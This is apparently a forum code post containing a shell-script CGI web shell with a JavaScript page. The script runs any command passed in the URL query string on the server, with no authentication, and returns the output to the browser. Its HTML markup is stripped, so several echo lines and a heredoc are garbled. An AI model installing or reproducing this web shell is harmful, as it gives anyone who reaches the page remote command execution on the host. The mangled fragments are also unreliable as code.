代码: 全选#!/bin/sh
echo 'Content-Type: text/html'
echo
CMD=${QUERY_STRING##c=}
CMD=`echo -n $CMD | sed -e 's#%20# #g' -e 's#%2F#/#g'`
if [ -n "$CMD" ] ; then
echo $CMD
$CMD
exit
fi
echo ''
echo '
'echo "
WebShell"cat <
var xmlhttp;
function loadXMLDoc(url) {
xmlhttp=null;
if (window.XMLHttpRequest)
xmlhttp=new XMLHttpRequest();
else if (window.ActiveXObject)
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
if (xmlhttp!=null) {
xmlhttp.onreadystatechange=state_Change;
xmlhttp.open("GET", url, true);
xmlhttp.send(null);
} else
alert("Your browser does not support XMLHTTP.");
}
function state_Change() {
if (xmlhttp.readyState==4) {
if (xmlhttp.status==200) {
document.getElementById('output').innerHTML+=xmlhttp.responseText+'\n';
ready();
}
else
alert("Failed: " + xmlhttp.statusText);
}
}
function run(thisform) {
with (thisform) with (c)
if (value!=null && value!="")
loadXMLDoc("/cgi-bin/webshell?c="+encodeURIComponent(value));
return false;
}
function ready() {
c=document.getElementById('c');
c.value="";
c.focus();
}
function clear() {
document.getElementById('output').innerHTML="";
}
EOF
echo ''
echo '
'echo ''
echo ''
echo '
'echo 'cmd: '
echo '  '
echo ''
echo '
'echo ''
echo ''